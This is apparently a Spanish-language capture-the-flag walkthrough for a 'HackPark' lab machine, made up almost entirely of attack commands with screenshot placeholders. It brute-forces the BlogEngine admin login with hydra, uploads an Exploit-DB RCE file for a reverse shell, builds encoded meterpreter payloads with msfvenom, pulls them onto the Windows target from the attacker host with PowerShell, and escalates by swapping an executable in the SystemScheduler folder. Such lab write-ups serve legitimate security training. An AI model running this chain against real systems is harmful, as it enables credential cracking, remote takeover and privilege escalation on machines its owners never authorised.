nmap -A -p- -oA output 10.10.142.176 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210504070455.png

Bajamos la imagen y la buscamos aqui: https://tineye.com/ El payaso es pennywise

nmap -sC -sV -O -p- -oA hackpark 10.10.142.176

nmap -sU -O -p- -oA hackpark-udp 10.10.142.176

nikto -h 10.10.142.176:80

gobuster dir -k -u http://10.10.142.176:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

curl -s http://10.10.142.176/Account/login.aspx?ReturnURL=/admin/ | grep "<form"

Pasted image 20210504071816.png

Pasted image 20210504072258.png

hydra -f -l admin -P /data/src/wordlists/rockyou.txt 10.10.142.178 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

admin/1qaz2wsx

Pasted image 20210504073112.png

Entramos con las credenciales de arriba y le damos click en About. La version de blogengine es 3.3.6.0

Pasted image 20210504074024.png

Podemos encontrar un exploit en exploitdb https://www.exploit-db.com/raw/46353

Modificamos la ip y el puerto a PostView.ascx

Pasted image 20210504074928.png

Vamos a http://10.10.142.176/admin/#/content/posts

Vamos al post que se llama Welcome to HackPark Le damos click al icono de File manager

Pasted image 20210504075429.png

Subimos el archivo modificado

Pasted image 20210504080340.png

Click en Guardar

rlwrap nc -lvnp 4445

Pasted image 20210504080502.png

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=tun0 LPORT=7777 -f exe -o hackpark.exe

python -m http.server 8888

Pasted image 20210504081324.png

powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/hackpark.exe' -OutFile 'c:\windows\temp\hackpark.exe'"

Pasted image 20210504081454.png

$ msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST tun0 msf6 exploit(multi/handler) > set LPORT 7777 msf6 exploit(multi/handler) > run

Ahora en el servidor de windows c:\windows\system32\inetsrv>cd \windows\temp c:\Windows\Temp>dir c:\Windows\Temp>.\hackpark.exe

meterpreter> ps

Pasted image 20210504082117.png

meterpreter > cd "c:\program files (x86)" meterpreter > ls

Pasted image 20210504082507.png

meterpreter > cd SystemScheduler meterpreter > ls

Pasted image 20210504082635.png

meterpreter > cd events meterpreter > ls

Pasted image 20210504082700.png

meterpreter > cat 20198415519.INI_LOG.txt

Pasted image 20210504082857.png

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=tun0 LPORT=1234 -f exe -o Message.exe

$ msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST tun0 msf6 exploit(multi/handler) > set LPORT 1234 msf6 exploit(multi/handler) > run

--Corremos el siguiente comando en la maquina de windows powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

c:\windows\system32\inetsrv>cd \windows\temp c:\Windows\Temp>dir c:\Windows\Temp>.\Message.exe

powershell -c "Invoke-WebRequest -Uri 'http://10.6.72.57:8888/winPEAS.bat' -OutFile 'c:\windows\temp\winpeas.exe'"

Pasted image 20210504091742.png

boxes

copyright©2022 Cu3rv0x all rights reserved